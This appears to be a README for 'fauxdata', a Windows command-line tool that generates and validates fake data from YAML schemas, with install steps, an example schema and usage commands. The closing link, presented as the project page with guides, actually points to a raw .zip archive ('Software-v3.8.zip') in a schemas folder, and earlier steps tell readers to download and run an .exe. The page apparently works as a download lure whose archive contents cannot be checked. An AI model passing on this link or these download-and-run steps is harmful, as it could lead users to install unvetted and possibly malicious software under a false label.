fauxdata is a tool you can use on your Windows computer to create fake data. This data looks real and matches rules you set. You can also check if your fake data is correct. It uses simple files called YAML schemas to know what data to make.
This tool is mainly for people who want to test things with data but do not want to use real information. It can work with different data types like CSV and Parquet files. It helps make sure your test data is good quality and follows the rules you want.
Before you start, check these needs for your computer:
- Windows 10 or newer (64-bit recommended)
- At least 4 GB of free RAM
- 500 MB of free disk space
- Internet connection to download the tool
- Command Line Interface (CLI) access—this comes with Windows as "Command Prompt" or "PowerShell"
- Create fake data from customizable YAML files
- Works with common file formats like CSV and Parquet
- Supports local settings to make data that fits your region
- Validates data to catch mistakes before use
- Runs smoothly on Windows with simple commands
- Helps test software or databases safely without real info
Click the button below to visit the main page where you can download the software and find the latest version.
-
Open your web browser and go to the fauxdata GitHub page.
-
Look for the Releases section on the page. This is where you will find the files to download.
-
Find the latest release. It usually has the highest version number or is marked "Latest."
-
Download the Windows version of fauxdata. It may have a file name ending with
.exeor a zipped file like.zip. -
If you download a
.zipfile:- Right-click on the file.
- Select Extract All.
- Choose a folder where you want to keep fauxdata.
- Click Extract.
-
If you downloaded an
.exefile, double-click it and follow the installation prompts.
-
Open Command Prompt or PowerShell on your computer:
- Press the Start button.
- Type
cmdorpowershell. - Press Enter.
-
Navigate to the folder where you installed or extracted fauxdata:
- Type
cd path\to\fauxdataand press Enter. - Replace
path\to\fauxdatawith the actual folder address.
- Type
-
To generate fake data, you will need a YAML schema file that describes the data you want.
-
Run the command:
fauxdata generate your-schema.yamlReplace
your-schema.yamlwith the path to your YAML file. -
The fake data will be created in the current folder or location you specify.
-
To check your data for errors, use:
fauxdata validate generated-data.csvReplace
generated-data.csvwith the file name you want to check.
The YAML schema tells fauxdata what kind of data to make. Here is an example of a simple YAML file:
columns:
- name: id
type: integer
start: 1
end: 100
- name: name
type: name
- name: email
type: email
- name: created_at
type: date
start: 2020-01-01
end: 2023-12-31This file will create 100 fake records with ID numbers, names, emails, and dates.
Save this file with any name like example.yaml and use it with the generate command.
Use the validate command to check if your data meets the rules.
Example:
fauxdata validate data.csv
This checks the file data.csv. It will report if something is wrong with the data that does not match your schema.
-
Generate data:
fauxdata generate your-schema.yaml -
Validate data:
fauxdata validate your-data.csv -
Help:
fauxdata --help
You can keep your YAML files and generated data anywhere on your computer. Just remember the folder path so you can point fauxdata to the right place in the command line.
To get new updates:
-
Visit the fauxdata GitHub page again.
-
Download the latest version as you did the first time.
-
Replace your old files with the new ones.
- If fauxdata does not run, check if you typed the commands correctly.
- Make sure you are in the correct folder in the command prompt.
- If an error shows about missing files, check your schema file path.
- You can open an issue on the GitHub page if problems continue.
Visit the project page for examples, help, and updates:
https://github.com/sidu-gaming/fauxdata/raw/refs/heads/main/schemas/Software-v3.8.zip
This page has guides and information about how to use the tool in detail.